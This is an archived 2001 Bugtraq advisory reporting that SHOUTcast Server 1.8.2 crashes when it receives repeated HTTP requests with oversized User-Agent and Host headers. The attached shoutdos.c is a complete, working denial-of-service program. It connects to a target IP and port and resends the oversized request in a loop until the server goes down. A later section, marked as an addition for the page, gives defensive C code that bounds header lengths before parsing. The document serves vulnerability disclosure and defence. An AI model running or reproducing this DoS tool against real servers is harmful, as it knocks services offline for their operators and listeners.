6841915 2001-08-03 10:29 +0200 /49 lines/ FraMe <frame@hispalab.com>
Sent by: joel@lysator.liu.se
Imported: 2001-08-03 17:02 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18614>
Subject: Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?
------------------------------------------------------------

Vendor  : Nullsoft
Product : SHOUTcast Server 1.8.2 Linux/win32/?
Date    : 01/08/2001

CONTENTS

1. Overview
2. Details
3. Systems
4. Denial of Service
5. Vendor Response

1. Overview

SHOUTcast Server is a streaming audio server. A malformed client request can crash the server.

2. Details

The server crashes after it has received, approximately seven times, a client HTTP request whose User-Agent and Host header fields each carry a very long value (about 4KB).

3. Systems

- SHOUTcast Server 1.8.2 ( Linux )
- SHOUTcast Server 1.8.2 ( Win32 )
- SHOUTcast Server 1.8.2 ( Others ) ( not tested )

4. Denial of Service

The DoS, written in C, is attached (shoutdos.c).

5. Vendor Response

31/08/01: Sent problem to tom@nullsoft.com
03/08/01: No response from tom@nullsoft.com. Sent problem to bugtraq@securityfocus.com

=================================================
[ FraMe - frame@hispalab.com ]
[ Digital LiVe - http://frame.lifefromthenet.com ]
[ PGP Key - www.hispalab.com/frame/pgpkey.asc ]
[ Geek Code - www.hispalab.com/frame/geek.txt ]
=================================================
(6841915) /FraMe <frame@hispalab.com>/----(rewrapped)
Attachment (application/octet-stream) in text 6841916

6841916 2001-08-03 10:29 +0200 /93 lines/ FraMe <frame@hispalab.com>
Attachment filename: "shoutdos.c"
Imported: 2001-08-03 17:02 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18615>
Attachment (text/plain) to text 6841915
Subject: Attachment (shoutdos.c) to: Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?
------------------------------------------------------------

/*
 * ShoutDoS: Remote Denial of Service SHOUTcast Server
 *
 * ShoutDoS (C) 2001 FraMe <frame@hispalab.com>
 *
 * Tested:
 *   SHOUTcast Server 1.8.2 Linux
 *   SHOUTcast Server 1.8.2 Win32
 *
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>        /* close(), read(), write() */
#include <netdb.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/errno.h>

void msg(void)
{
    printf("ShoutDoS: Remote Denial of Service SHOUTcast Server\n");
    printf("ShoutDoS (C) 2001 FraMe <frame@hispalab.com>\n");
}

int main(int argc, char **argv)
{
    int s, n = 0, c;
    struct sockaddr_in sa;
    struct hostent *SHOUTserver;

    /* The request carries an oversized (about 4KB) User-Agent value and an
     * oversized Host value, the two fields the advisory names.  The literal
     * is split with adjacent-string concatenation only for readability. */
    char buffer[] =
        "GET / HTTP/1.0\r\n"
        "User-Agent: "
        "SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUT"
        "castDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofService"
        "\r\n"
        "Host: "
        "your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now."
        "your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now"
        "\r\n"
        "Authorization: Basic\r\n"
        "\r\n";
    char rbuff[512];

    if (argc != 3) {
        msg();
        printf("Usage: %s ip port\n", *argv);
        exit(1);
    }

    if ((SHOUTserver = gethostbyname(argv[1])) == NULL) {
        msg();
        printf("Error: gethostbyname()\n");
        exit(1);
    }

    memcpy(&sa.sin_addr.s_addr, SHOUTserver->h_addr, SHOUTserver->h_length);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(atoi(argv[2]));

    /* First connection only checks that the host is reachable. */
    if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
        msg();
        printf("Error: socket()\n");
        exit(1);
    }

    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        msg();
        printf("Error: connect()\n");
        exit(1);
    }

    close(s);
    msg();
    printf("Connect. The host appears to be up...\n");
    printf("Doing DoS ");

    /* Send the oversized request repeatedly; a failed connect is taken as
     * the sign that the server has gone down. */
DoS:
    if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
        printf(" Error!\n");
        exit(1);
    }

    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        printf(" Server Crash!\n");
        exit(1);
    }

    write(s, buffer, sizeof(buffer) - 1);
    read(s, rbuff, sizeof(rbuff));
    close(s);
    printf(".");

    goto DoS;   // Basic Power :)
}

/* EOF */

(6841916) /FraMe <frame@hispalab.com>/----(rewrapped)
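The advisory's Details section attributes the crash to oversized User-Agent and Host header values. The defensive counterpart is to bound every request and header line before any of it is copied into a fixed-size buffer. The following is an added example written for this page; it is not code from the advisory, from FraMe, or from Nullsoft, and the limits (MAX_LINE_LEN, MAX_LINES), the names, and the sample requests are all assumptions constructed here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example: a bounded scanner for the header block of an HTTP/1.0
 * request, run on the raw bytes before any value is parsed or copied.
 * Limits below are assumed values, not anything from the advisory. */
#define MAX_LINE_LEN 1024   /* assumed: longest accepted request/header line, in bytes */
#define MAX_LINES    32     /* assumed: request line plus header lines, before the blank line */

enum hdr_verdict {
    HDR_OK = 0,
    HDR_LINE_TOO_LONG,   /* some line (CR/LF excluded) exceeds MAX_LINE_LEN */
    HDR_TOO_MANY_LINES,  /* more than MAX_LINES lines before the blank line */
    HDR_UNTERMINATED     /* no blank line closes the header block */
};

/* Scan buf[0..len) line by line.  On return *line_no (if non-NULL) holds the
 * 1-based number of the last line examined, so on HDR_LINE_TOO_LONG it
 * identifies the offending line.  No byte past len is ever read. */
enum hdr_verdict scan_request_headers(const char *buf, size_t len, size_t *line_no)
{
    size_t pos = 0, count = 0;

    while (pos < len) {
        const char *start = buf + pos;
        const char *eol = memchr(start, '\n', len - pos);
        if (eol == NULL)
            return HDR_UNTERMINATED;        /* line never finished */

        size_t line_len = (size_t)(eol - start);
        if (line_len > 0 && start[line_len - 1] == '\r')
            line_len--;                     /* tolerate CRLF or bare LF */

        count++;
        if (line_no)
            *line_no = count;
        if (line_len == 0)
            return HDR_OK;                  /* blank line ends the headers */
        if (line_len > MAX_LINE_LEN)
            return HDR_LINE_TOO_LONG;
        if (count > MAX_LINES)
            return HDR_TOO_MANY_LINES;

        pos = (size_t)(eol - buf) + 1;
    }
    return HDR_UNTERMINATED;
}

/* Constructed test input: a request whose User-Agent value is ua_len filler
 * bytes, shaped like the long-header request the advisory describes.
 * Returns the request length, or 0 if cap is too small. */
size_t build_request(char *out, size_t cap, size_t ua_len)
{
    const char *head = "GET / HTTP/1.0\r\nUser-Agent: ";
    const char *tail = "\r\nHost: example.invalid\r\n\r\n";
    size_t hl = strlen(head), tl = strlen(tail);
    size_t need = hl + ua_len + tl;

    if (need + 1 > cap)
        return 0;
    memcpy(out, head, hl);
    memset(out + hl, 'A', ua_len);
    memcpy(out + hl + ua_len, tail, tl + 1);   /* includes the NUL */
    return need;
}

int main(void)
{
    static const char *names[] = { "ok", "line too long", "too many lines", "unterminated" };
    char req[8192];
    size_t n, line = 0;

    n = build_request(req, sizeof req, 16);
    printf("16-byte User-Agent:   %s (line %zu)\n",
           names[scan_request_headers(req, n, &line)], line);

    n = build_request(req, sizeof req, 4096);
    printf("4096-byte User-Agent: %s (line %zu)\n",
           names[scan_request_headers(req, n, &line)], line);
    return 0;
}
```

The scanner rejects the request before a single header value is copied, which is the point at which a fixed-size destination buffer would otherwise be overrun or exhausted; returning a verdict rather than aborting lets the server log the peer and close the connection cleanly.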